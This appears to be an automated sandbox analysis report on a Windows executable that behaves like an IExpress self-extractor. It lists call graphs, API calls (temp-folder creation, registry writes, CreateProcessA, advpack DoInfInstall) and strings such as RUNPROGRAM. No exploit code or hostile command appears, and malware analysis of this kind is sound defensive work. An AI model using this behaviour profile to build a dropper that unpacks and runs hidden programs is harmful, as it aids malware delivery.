df564b LocalFree 2600->2602 2603 df5645 2600->2603 2604 df561f LocalFree 2601->2604 2605 df565b 2602->2605 2606 df5696 2602->2606 2603->2602 2604->2625 2611 df5467 49 API calls 2605->2611 2607 df589f 2606->2607 2610 df56ae GetTempPathA 2606->2610 2608 df6517 24 API calls 2607->2608 2608->2625 2609 df6ce0 4 API calls 2612 df2f7e 2609->2612 2613 df56eb 2610->2613 2614 df56c3 2610->2614 2615 df5678 2611->2615 2612->2342 2612->2346 2619 df586c GetWindowsDirectoryA 2613->2619 2620 df5717 GetDriveTypeA 2613->2620 2613->2625 2731 df5467 2614->2731 2618 df44b9 20 API calls 2615->2618 2615->2625 2618->2625 2765 df597d GetCurrentDirectoryA SetCurrentDirectoryA 2619->2765 2621 df5730 GetFileAttributesA 2620->2621 2635 df572b 2620->2635 2621->2635 2625->2609 2626 df597d 34 API calls 2626->2635 2627 df5467 49 API calls 2627->2613 2628 df2630 21 API calls 2628->2635 2630 df57c1 GetWindowsDirectoryA 2630->2635 2631 df658a CharPrevA 2632 df57e8 GetFileAttributesA 2631->2632 2633 df57fa CreateDirectoryA 2632->2633 2632->2635 2633->2635 2634 df5827 SetFileAttributesA 2634->2635 2635->2619 2635->2620 2635->2621 2635->2625 2635->2626 2635->2628 2635->2630 2635->2631 2635->2634 2636 df5467 49 API calls 2635->2636 2761 df6952 2635->2761 2636->2635 2638 df6249 2637->2638 2639 df6268 2637->2639 2641 df44b9 20 API calls 2638->2641 2640 df597d 34 API calls 2639->2640 2642 df625f 2640->2642 2643 df625a 2641->2643 2644 df6ce0 4 API calls 2642->2644 2645 df6285 GetLastError 2643->2645 2646 df3013 2644->2646 2645->2642 2646->2342 2646->2353 2648 df3b2d 2647->2648 2648->2648 2649 df3b72 2648->2649 2650 df3b53 2648->2650 2831 df4fe0 2649->2831 2652 df6517 24 API calls 2650->2652 2653 df3b70 2652->2653 2654 df6298 10 API calls 2653->2654 2655 df3b7b 2653->2655 2654->2655 2655->2359 2657 df2583 2656->2657 2658 df2622 2656->2658 2660 df258b 2657->2660 2661 df25e8 RegOpenKeyExA 2657->2661 2858 df24e0 GetWindowsDirectoryA 2658->2858 2662 df25e3 2660->2662 2664 df259b RegOpenKeyExA 2660->2664 2661->2662 2663 df2609 RegQueryInfoKeyA 2661->2663 2662->2367 2665 df25d1 RegCloseKey 2663->2665 2664->2662 2666 df25bc RegQueryValueExA 2664->2666 2665->2662 2666->2665 2668 df3bdb 2667->2668 2682 df3bec 2667->2682 2669 df468f 7 API calls 2668->2669 2669->2682 2670 df3c03 memset 2670->2682 2671 df3d13 2672 df44b9 20 API calls 2671->2672 2678 df3d26 2672->2678 2674 df6ce0 4 API calls 2675 df3f60 2674->2675 2675->2368 2676 df3d7b CompareStringA 2677 df3fd7 2676->2677 2676->2682 2677->2678 2957 df2267 2677->2957 2678->2674 2680 df3fab 2683 df44b9 20 API calls 2680->2683 2682->2670 2682->2671 2682->2676 2682->2677 2682->2678 2682->2680 2684 df3f1e LocalFree 2682->2684 2685 df3f46 LocalFree 2682->2685 2688 df468f 7 API calls 2682->2688 2690 df3cc7 CompareStringA 2682->2690 2701 df3e10 2682->2701 2866 df1ae8 2682->2866 2907 df202a memset memset RegCreateKeyExA 2682->2907 2933 df3fef 2682->2933 2687 df3fbe LocalFree 2683->2687 2684->2677 2684->2682 2685->2678 2687->2678 2688->2682 2690->2682 2691 df3e1f GetProcAddress 2694 df3f64 2691->2694 2691->2701 2692 df3f92 2693 df44b9 20 API calls 2692->2693 2695 df3fa9 2693->2695 2696 df44b9 20 API calls 2694->2696 2697 df3f7c LocalFree 2695->2697 2698 df3f75 FreeLibrary 2696->2698 2699 df6285 GetLastError 2697->2699 2698->2697 2700 df3f8b 2699->2700 2700->2678 2701->2691 2701->2692 2702 df3eff FreeLibrary 2701->2702 2703 df3f40 FreeLibrary 2701->2703 2947 df6495 2701->2947 2702->2684 2703->2685 2705 df628f 2704->2705 2705->2342 2707 df468f 7 API calls 2706->2707 2708 df417d LocalAlloc 2707->2708 2709 df41a8 2708->2709 2710 df4195 2708->2710 2712 df468f 7 API calls 2709->2712 2711 df44b9 20 API calls 2710->2711 2713 df41a6 2711->2713 2714 df41b5 2712->2714 2713->2342 2715 df41b9 2714->2715 2716 df41c5 lstrcmpA 2714->2716 2718 df44b9 20 API calls 2715->2718 2716->2715 2717 df41e6 LocalFree 2716->2717 2717->2713 2718->2717 2720 df171e _vsnprintf 2719->2720 2721 df62c9 FindResourceA 2720->2721 2723 df62cb LoadResource LockResource 2721->2723 2724 df6353 2721->2724 2723->2724 2727 df62e0 2723->2727 2725 df6ce0 4 API calls 2724->2725 2726 df51ca 2725->2726 2726->2587 2726->2588 2728 df631b FreeResource 2727->2728 2729 df6355 FreeResource 2727->2729 2730 df171e _vsnprintf 2728->2730 2729->2724 2730->2721 2732 df548a 2731->2732 2749 df551a 2731->2749 2791 df53a1 2732->2791 2734 df5581 2738 df6ce0 4 API calls 2734->2738 2737 df5495 2737->2734 2741 df550c 2737->2741 2742 df54c2 GetSystemInfo 2737->2742 2743 df559a 2738->2743 2739 df554d 2739->2734 2748 df597d 34 API calls 2739->2748 2740 df553b CreateDirectoryA 2744 df5577 2740->2744 2745 df5547 2740->2745 2746 df658a CharPrevA 2741->2746 2751 df54da 2742->2751 2743->2625 2755 df2630 GetWindowsDirectoryA 2743->2755 2747 df6285 GetLastError 2744->2747 2745->2739 2746->2749 2750 df557c 2747->2750 2752 df555c 2748->2752 2802 df58c8 2749->2802 2750->2734 2751->2741 2753 df658a CharPrevA 2751->2753 2752->2734 2754 df5568 RemoveDirectoryA 2752->2754 2753->2741 2754->2734 2756 df266f 2755->2756 2757 df265e 2755->2757 2759 df6ce0 4 API calls 2756->2759 2758 df44b9 20 API calls 2757->2758 2758->2756 2760 df2687 2759->2760 2760->2613 2760->2627 2762 df696e GetDiskFreeSpaceA 2761->2762 2763 df69a1 2761->2763 2762->2763 2764 df6989 MulDiv 2762->2764 2763->2635 2764->2763 2766 df59dd GetDiskFreeSpaceA 2765->2766 2767 df59bb 2765->2767 2768 df5ba1 memset 2766->2768 2769 df5a21 MulDiv 2766->2769 2770 df44b9 20 API calls 2767->2770 2771 df6285 GetLastError 2768->2771 2769->2768 2772 df5a50 GetVolumeInformationA 2769->2772 2773 df59cc 2770->2773 2775 df5bbc GetLastError FormatMessageA 2771->2775 2776 df5a6e memset 2772->2776 2777 df5ab5 SetCurrentDirectoryA 2772->2777 2774 df6285 GetLastError 2773->2774 2784 df59d1 2774->2784 2778 df5be3 2775->2778 2779 df6285 GetLastError 2776->2779 2786 df5acc 2777->2786 2780 df44b9 20 API calls 2778->2780 2781 df5a89 GetLastError FormatMessageA 2779->2781 2782 df5bf5 SetCurrentDirectoryA 2780->2782 2781->2778 2782->2784 2783 df6ce0 4 API calls 2785 df5c11 2783->2785 2784->2783 2785->2613 2787 df5b0a 2786->2787 2789 df5b20 2786->2789 2788 df44b9 20 API calls 2787->2788 2788->2784 2789->2784 2814 df268b 2789->2814 2793 df53bf 2791->2793 2792 df171e _vsnprintf 2792->2793 2793->2792 2794 df658a CharPrevA 2793->2794 2797 df5415 GetTempFileNameA 2793->2797 2795 df53fa RemoveDirectoryA GetFileAttributesA 2794->2795 2795->2793 2796 df544f CreateDirectoryA 2795->2796 2796->2797 2798 df543a 2796->2798 2797->2798 2799 df5429 DeleteFileA CreateDirectoryA 2797->2799 2800 df6ce0 4 API calls 2798->2800 2799->2798 2801 df5449 2800->2801 2801->2737 2803 df58d8 2802->2803 2803->2803 2804 df58df LocalAlloc 2803->2804 2805 df5919 2804->2805 2806 df58f3 2804->2806 2809 df658a CharPrevA 2805->2809 2807 df44b9 20 API calls 2806->2807 2813 df5906 2807->2813 2808 df6285 GetLastError 2811 df5534 2808->2811 2810 df5931 CreateFileA LocalFree 2809->2810 2812 df595b CloseHandle GetFileAttributesA 2810->2812 2810->2813 2811->2739 2811->2740 2812->2813 2813->2808 2813->2811 2815 df26b9 2814->2815 2816 df26e5 2814->2816 2817 df171e _vsnprintf 2815->2817 2818 df271f 2816->2818 2819 df26ea 2816->2819 2820 df26cc 2817->2820 2822 df26e3 2818->2822 2826 df171e _vsnprintf 2818->2826 2821 df171e _vsnprintf 2819->2821 2823 df44b9 20 API calls 2820->2823 2825 df26fd 2821->2825 2824 df6ce0 4 API calls 2822->2824 2823->2822 2827 df276d 2824->2827 2828 df44b9 20 API calls 2825->2828 2829 df2735 2826->2829 2827->2784 2828->2822 2830 df44b9 20 API calls 2829->2830 2830->2822 2832 df468f 7 API calls 2831->2832 2833 df4ff5 FindResourceA LoadResource LockResource 2832->2833 2834 df5020 2833->2834 2846 df515f 2833->2846 2835 df5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2834->2835 2836 df5057 2834->2836 2835->2836 2850 df4efd 2836->2850 2839 df5060 2840 df44b9 20 API calls 2839->2840 2841 df5075 2840->2841 2842 df511d 2841->2842 2843 df5110 FreeResource 2841->2843 2845 df513a 2842->2845 2847 df44b9 20 API calls 2842->2847 2843->2842 2844 df44b9 20 API calls 2844->2841 2845->2846 2848 df514c SendMessageA 2845->2848 2846->2653 2847->2845 2848->2846 2849 df507c 2849->2841 2849->2844 2851 df4f4a 2850->2851 2852 df4fa1 2851->2852 2853 df4980 25 API calls 2851->2853 2854 df6ce0 4 API calls 2852->2854 2856 df4f67 2853->2856 2855 df4fc6 2854->2855 2855->2839 2855->2849 2856->2852 2857 df4b60 CloseHandle 2856->2857 2857->2852 2859 df255b 2858->2859 2860 df2510 2858->2860 2861 df6ce0 4 API calls 2859->2861 2862 df658a CharPrevA 2860->2862 2863 df2569 2861->2863 2864 df2522 WritePrivateProfileStringA _lopen 2862->2864 2863->2662 2864->2859 2865 df2548 _llseek _lclose 2864->2865 2865->2859 2867 df1b25 2866->2867 2971 df1a84 2867->2971 2869 df1b57 2870 df658a CharPrevA 2869->2870 2872 df1b8c 2869->2872 2870->2872 2871 df66c8 2 API calls 2873 df1bd1 2871->2873 2872->2871 2874 df1bd9 CompareStringA 2873->2874 2875 df1d73 2873->2875 2874->2875 2876 df1bf7 GetFileAttributesA 2874->2876 2877 df66c8 2 API calls 2875->2877 2878 df1c0d 2876->2878 2879 df1d53 2876->2879 2880 df1d7d 2877->2880 2878->2879 2887 df1a84 2 API calls 2878->2887 2881 df1d64 2879->2881 2882 df1df8 LocalAlloc 2880->2882 2883 df1d81 CompareStringA 2880->2883 2885 df44b9 20 API calls 2881->2885 2882->2881 2886 df1e0b GetFileAttributesA 2882->2886 2883->2882 2884 df1d9b LocalAlloc 2883->2884 2884->2881 2898 df1de1 2884->2898 2900 df1d6c 2885->2900 2892 df1e1d 2886->2892 2904 df1e45 2886->2904 2889 df1c31 2887->2889 2888 df1c50 LocalAlloc 2888->2881 2890 df1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2888->2890 2889->2888 2893 df1a84 2 API calls 2889->2893 2899 df1cf8 2890->2899 2905 df1cc2 2890->2905 2891 df6ce0 4 API calls 2897 df1ea1 2891->2897 2892->2904 2893->2888 2897->2682 2903 df171e _vsnprintf 2898->2903 2901 df1d09 GetShortPathNameA 2899->2901 2902 df1d23 2899->2902 2900->2891 2901->2902 2906 df171e _vsnprintf 2902->2906 2903->2905 2977 df2aac 2904->2977 2905->2900 2906->2905 2908 df209a 2907->2908 2909 df2256 2907->2909 2911 df171e _vsnprintf 2908->2911 2914 df20dc 2908->2914 2910 df6ce0 4 API calls 2909->2910 2912 df2263 2910->2912 2913 df20af RegQueryValueExA 2911->2913 2912->2682 2913->2908 2913->2914 2915 df20fb GetSystemDirectoryA 2914->2915 2916 df20e4 RegCloseKey 2914->2916 2917 df658a CharPrevA 2915->2917 2916->2909 2918 df211b LoadLibraryA 2917->2918 2919 df212e GetProcAddress FreeLibrary 2918->2919 2920 df2179 GetModuleFileNameA 2918->2920 2919->2920 2921 df214e GetSystemDirectoryA 2919->2921 2922 df21de RegCloseKey 2920->2922 2925 df2177 2920->2925 2923 df2165 2921->2923 2921->2925 2922->2909 2924 df658a CharPrevA 2923->2924 2924->2925 2925->2925 2926 df21b7 LocalAlloc 2925->2926 2927 df21cd 2926->2927 2928 df21ec 2926->2928 2929 df44b9 20 API calls 2927->2929 2930 df171e _vsnprintf 2928->2930 2929->2922 2931 df2218 RegSetValueExA RegCloseKey LocalFree 2930->2931 2931->2909 2934 df4106 2933->2934 2935 df4016 CreateProcessA 2933->2935 2938 df6ce0 4 API calls 2934->2938 2936 df40c4 2935->2936 2937 df4041 WaitForSingleObject GetExitCodeProcess 2935->2937 2941 df6285 GetLastError 2936->2941 2939 df4070 2937->2939 2940 df4117 2938->2940 3004 df411b 2939->3004 2940->2682 2943 df40c9 GetLastError FormatMessageA 2941->2943 2945 df44b9 20 API calls 2943->2945 2944 df4096 CloseHandle CloseHandle 2944->2934 2946 df40ba 2944->2946 2945->2934 2946->2934 2948 df64c2 2947->2948 2949 df658a CharPrevA 2948->2949 2950 df64d8 GetFileAttributesA 2949->2950 2951 df64ea 2950->2951 2952 df6501 LoadLibraryA 2950->2952 2951->2952 2953 df64ee LoadLibraryExA 2951->2953 2954 df6508 2952->2954 2953->2954 2955 df6ce0 4 API calls 2954->2955 2956 df6513 2955->2956 2956->2701 2958 df2289 RegOpenKeyExA 2957->2958 2959 df2381 2957->2959 2958->2959 2961 df22b1 RegQueryValueExA 2958->2961 2960 df6ce0 4 API calls 2959->2960 2962 df238c 2960->2962 2963 df22e6 memset GetSystemDirectoryA 2961->2963 2964 df2374 RegCloseKey 2961->2964 2962->2678 2965 df230f 2963->2965 2966 df2321 2963->2966 2964->2959 2968 df658a CharPrevA 2965->2968 2967 df171e _vsnprintf 2966->2967 2969 df233f RegSetValueExA 2967->2969 2968->2966 2969->2964 2972 df1a9a 2971->2972 2974 df1aba 2972->2974 2976 df1aaf 2972->2976 2990 df667f 2972->2990 2974->2869 2975 df667f 2 API calls 2975->2976 2976->2974 2976->2975 2978 df2be6 2977->2978 2979 df2ad4 GetModuleFileNameA 2977->2979 2980 df6ce0 4 API calls 2978->2980 2989 df2b02 2979->2989 2982 df2bf5 2980->2982 2981 df2af1 IsDBCSLeadByte 2981->2989 2982->2900 2983 df2bca CharNextA 2986 df2bd3 CharNextA 2983->2986 2984 df2b11 CharNextA CharUpperA 2985 df2b8d CharUpperA 2984->2985 2984->2989 2985->2989 2986->2989 2988 df2b43 CharPrevA 2988->2989 2989->2978 2989->2981 2989->2983 2989->2984 2989->2986 2989->2988 2995 df65e8 2989->2995 2991 df6689 2990->2991 2992 df66a5 2991->2992 2993 df6648 IsDBCSLeadByte 2991->2993 2994 df6697 CharNextA 2991->2994 2992->2972 2993->2991 2994->2991 2996 df65f4 2995->2996 2996->2996 2997 df65fb CharPrevA 2996->2997 2998 df6611 CharPrevA 2997->2998 2999 df661e 2998->2999 3000 df660b 2998->3000 3001 df663d 2999->3001 3002 df6627 CharPrevA 2999->3002 3003 df6634 CharNextA 2999->3003 3000->2998 3000->2999 3001->2989 3002->3001 3002->3003 3003->3001 3005 df4132 3004->3005 3007 df412a 3004->3007 3008 df1ea7 3005->3008 3007->2944 3009 df1eba 3008->3009 3010 df1ed3 3008->3010 3011 df256d 15 API calls 3009->3011 3010->3007 3011->3010 3013 df2026 3012->3013 3014 df1ff0 RegOpenKeyExA 3012->3014 3013->2373 3014->3013 3015 df200f RegDeleteValueA RegCloseKey 3014->3015 3015->3013 3016 df4ca0 GlobalAlloc 3112 df4bc0 3113 df4c05 3112->3113 3115 df4bd7 3112->3115 3114 df4c1b SetFilePointer 3113->3114 3113->3115 3114->3115 3116 df19e0 3117 df1a24 GetDesktopWindow 3116->3117 3118 df1a03 3116->3118 3120 df43d0 11 API calls 3117->3120 3119 df1a20 3118->3119 3121 df1a16 EndDialog 3118->3121 3123 df6ce0 4 API calls 3119->3123 3122 df1a33 LoadStringA SetDlgItemTextA MessageBeep 3120->3122 3121->3119 3122->3119 3124 df1a7e 3123->3124 3125 df3100 3126 df3111 3125->3126 3127 df31b0 3125->3127 3130 df3149 GetDesktopWindow 3126->3130 3133 df311d 3126->3133 3128 df31b9 SendDlgItemMessageA 3127->3128 3131 df3141 3127->3131 3128->3131 3129 df3138 EndDialog 3129->3131 3132 df43d0 11 API calls 3130->3132 3134 df315d 6 API calls 3132->3134 3133->3129 3133->3131 3134->3131

                                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                                            callgraph 0 Function_00DF43D0 24 Function_00DF6CE0 0->24 1 Function_00DF4CD0 1->24 26 Function_00DF47E0 1->26 29 Function_00DF4E99 1->29 43 Function_00DF4980 1->43 69 Function_00DF476D 1->69 74 Function_00DF4B60 1->74 89 Function_00DF4702 1->89 93 Function_00DF4C37 1->93 2 Function_00DF4AD0 42 Function_00DF3680 2->42 3 Function_00DF67C9 32 Function_00DF6793 3->32 4 Function_00DF17C8 5 Function_00DF66C8 62 Function_00DF6648 5->62 6 Function_00DF58C8 37 Function_00DF658A 6->37 39 Function_00DF6285 6->39 44 Function_00DF1680 6->44 45 Function_00DF44B9 6->45 7 Function_00DF4CC0 8 Function_00DF4BC0 9 Function_00DF4EFD 9->24 9->43 9->74 10 Function_00DF2BFB 33 Function_00DF1F90 10->33 46 Function_00DF52B6 10->46 50 Function_00DF2CAA 10->50 81 Function_00DF2F1D 10->81 11 Function_00DF66F9 12 Function_00DF34F0 12->0 12->42 12->45 13 Function_00DF6CF0 14 Function_00DF3FEF 14->24 14->39 14->45 82 Function_00DF411B 14->82 15 Function_00DF36EE 15->3 18 Function_00DF28E8 15->18 15->24 38 Function_00DF2A89 15->38 15->45 78 Function_00DF681F 15->78 16 Function_00DF17EE 16->24 17 Function_00DF1AE8 17->5 17->24 17->37 40 Function_00DF1A84 17->40 41 Function_00DF1781 17->41 17->44 17->45 47 Function_00DF16B3 17->47 49 Function_00DF2AAC 17->49 80 Function_00DF171E 17->80 18->38 66 Function_00DF2773 18->66 19 Function_00DF65E8 20 Function_00DF51E5 35 Function_00DF468F 20->35 20->39 20->45 21 Function_00DF1FE1 22 Function_00DF4FE0 22->9 22->35 22->45 23 Function_00DF31E0 24->13 25 Function_00DF24E0 25->24 25->37 26->44 26->45 27 Function_00DF19E0 27->0 27->24 28 Function_00DF5C9E 28->5 28->23 28->24 28->37 28->44 28->45 63 Function_00DF667F 28->63 83 Function_00DF5C17 28->83 96 Function_00DF6E2A 28->96 29->44 30 Function_00DF6298 30->24 30->80 31 Function_00DF6495 31->24 31->37 31->41 33->24 33->45 51 Function_00DF1EA7 33->51 34 Function_00DF2390 34->24 34->34 34->37 34->44 34->47 36 Function_00DF268B 36->24 36->45 36->80 37->47 40->63 43->45 65 Function_00DF487A 43->65 44->41 45->3 45->24 45->44 45->78 45->80 46->19 46->21 46->24 46->34 46->41 47->41 48 Function_00DF66AE 49->4 49->19 49->24 49->44 50->15 50->24 50->28 50->34 50->35 50->45 52 Function_00DF18A3 50->52 84 Function_00DF6517 50->84 68 Function_00DF256D 51->68 52->16 52->24 53 Function_00DF3BA2 53->14 53->17 53->24 53->31 53->35 53->39 53->41 53->45 72 Function_00DF2267 53->72 95 Function_00DF202A 53->95 54 Function_00DF53A1 54->24 54->37 54->44 54->80 55 Function_00DF4CA0 56 Function_00DF55A0 56->24 56->35 56->37 56->39 56->41 56->45 58 Function_00DF6952 56->58 64 Function_00DF597D 56->64 71 Function_00DF5467 56->71 56->84 94 Function_00DF2630 56->94 57 Function_00DF7155 59 Function_00DF4A50 60 Function_00DF3450 60->0 61 Function_00DF724D 63->62 64->24 64->36 64->39 64->45 87 Function_00DF490C 65->87 66->24 66->37 66->41 66->44 67 Function_00DF7270 68->25 69->48 69->84 70 Function_00DF4169 70->35 70->45 71->6 71->24 71->37 71->39 71->41 71->44 71->54 71->64 72->24 72->37 72->80 73 Function_00DF5164 73->30 73->35 73->45 75 Function_00DF7060 85 Function_00DF7010 75->85 99 Function_00DF7120 75->99 76 Function_00DF6760 77 Function_00DF6A60 77->10 77->57 77->61 77->75 88 Function_00DF7208 77->88 92 Function_00DF6C3F 77->92 78->11 78->24 79 Function_00DF621E 79->24 79->39 79->45 79->64 81->20 81->24 81->37 81->39 81->45 81->53 81->56 81->68 81->70 81->73 81->79 91 Function_00DF3A3F 81->91 97 Function_00DF3B26 81->97 82->51 84->45 86 Function_00DF3210 86->0 86->6 86->37 86->45 86->64 98 Function_00DF4224 86->98 89->44 89->47 90 Function_00DF3100 90->0 91->35 91->39 91->45 91->84 94->24 94->45 95->24 95->37 95->45 95->80 96->13 97->22 97->30 97->84 98->44 98->45

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 00DF3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 36 df3ba2-df3bd9 37 df3bfd-df3bff 36->37 38 df3bdb-df3be7 call df468f 36->38 40 df3c03-df3c28 memset 37->40 41 df3bec-df3bee 38->41 42 df3c2e-df3c40 call df468f 40->42 43 df3d35-df3d48 call df1781 40->43 44 df3bf4-df3bf7 41->44 45 df3d13-df3d30 call df44b9 41->45 42->45 54 df3c46-df3c49 42->54 49 df3d4d-df3d52 43->49 44->37 44->45 55 df3f4d 45->55 52 df3d9e-df3db6 call df1ae8 49->52 53 df3d54-df3d6c call df468f 49->53 52->55 69 df3dbc-df3dc2 52->69 53->45 65 df3d6e-df3d75 53->65 54->45 57 df3c4f-df3c56 54->57 59 df3f4f-df3f63 call df6ce0 55->59 61 df3c58-df3c5e 57->61 62 df3c60-df3c65 57->62 66 df3c6e-df3c73 61->66 67 df3c67-df3c6d 62->67 68 df3c75-df3c7c 62->68 75 df3d7b-df3d98 CompareStringA 65->75 76 df3fda-df3fe1 65->76 70 df3c87-df3c89 66->70 67->66 68->70 73 df3c7e-df3c82 68->73 71 df3de6-df3de8 69->71 72 df3dc4-df3dce 69->72 70->49 78 df3c8f-df3c98 70->78 79 df3dee-df3df5 71->79 80 df3f0b-df3f15 call df3fef 71->80 72->71 77 df3dd0-df3dd7 72->77 73->70 75->52 75->76 81 df3fe8-df3fea 76->81 82 df3fe3 call df2267 76->82 77->71 84 df3dd9-df3ddb 77->84 85 df3c9a-df3c9c 78->85 86 df3cf1-df3cf3 78->86 87 df3fab-df3fd2 call df44b9 LocalFree 79->87 88 df3dfb-df3dfd 79->88 90 df3f1a-df3f1c 80->90 81->59 82->81 84->79 91 df3ddd-df3de1 call df202a 84->91 93 df3c9e-df3ca3 85->93 94 df3ca5-df3ca7 85->94 86->52 96 df3cf9-df3d11 call df468f 86->96 87->55 88->80 95 df3e03-df3e0a 88->95 97 df3f1e-df3f2d LocalFree 90->97 98 df3f46-df3f47 LocalFree 90->98 91->71 101 df3cb2-df3cc5 call df468f 93->101 94->55 102 df3cad 94->102 95->80 103 df3e10-df3e19 call df6495 95->103 96->45 96->49 106 df3fd7-df3fd9 97->106 107 df3f33-df3f3b 97->107 98->55 101->45 112 df3cc7-df3ce8 CompareStringA 101->112 102->101 113 df3e1f-df3e36 GetProcAddress 103->113 114 df3f92-df3fa9 call df44b9 103->114 106->76 107->40 112->86 116 df3cea-df3ced 112->116 117 df3e3c-df3e80 113->117 118 df3f64-df3f76 call df44b9 FreeLibrary 113->118 125 df3f7c-df3f90 LocalFree call df6285 114->125 116->86 121 df3e8b-df3e94 117->121 122 df3e82-df3e87 117->122 118->125 123 df3e9f-df3ea2 121->123 124 df3e96-df3e9b 121->124 122->121 127 df3ead-df3eb6 123->127 128 df3ea4-df3ea9 123->128 124->123 125->55 130 df3eb8-df3ebd 127->130 131 df3ec1-df3ec3 127->131 128->127 130->131 133 df3ece-df3eec 131->133 134 df3ec5-df3eca 131->134 137 df3eee-df3ef3 133->137 138 df3ef5-df3efd 133->138 134->133 137->138 139 df3eff-df3f09 FreeLibrary 138->139 140 df3f40 FreeLibrary 138->140 139->97 140->98
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00DF3C11
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00DF3CDC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46A0
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: SizeofResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46A9
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46C3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LoadResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46CC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LockResource.KERNEL32(00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46D3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: memcpy_s.MSVCRT ref: 00DF46E5
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46EF
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00DF8C42), ref: 00DF3D8F
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00DF3E26
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00DF8C42), ref: 00DF3EFF
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00DF8C42), ref: 00DF3F1F
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00DF8C42), ref: 00DF3F40
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00DF8C42), ref: 00DF3F47
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00DF8C42), ref: 00DF3F76
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00DF8C42), ref: 00DF3F80
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00DF8C42), ref: 00DF3FC2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$valid
                                                                                                                                                                                                                                                            • API String ID: 1032054927-3787364971
                                                                                                                                                                                                                                                            • Opcode ID: 5b04307c8dc7abf1bf0b3bfe328b98e01a861105559d67ee58d65a2289e14bf4
                                                                                                                                                                                                                                                            • Instruction ID: b55e1a00274dd1fd2d6199861f519352f7ee0d553940105f02ae5d6e4a8bd0d8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b04307c8dc7abf1bf0b3bfe328b98e01a861105559d67ee58d65a2289e14bf4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28B1C070A083099BD7209F24D845B7BB6E4EF84710F17C929FB89D6290DB75CA44CB76
                                                                                                                                                                                                                                                            Function 00DF1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
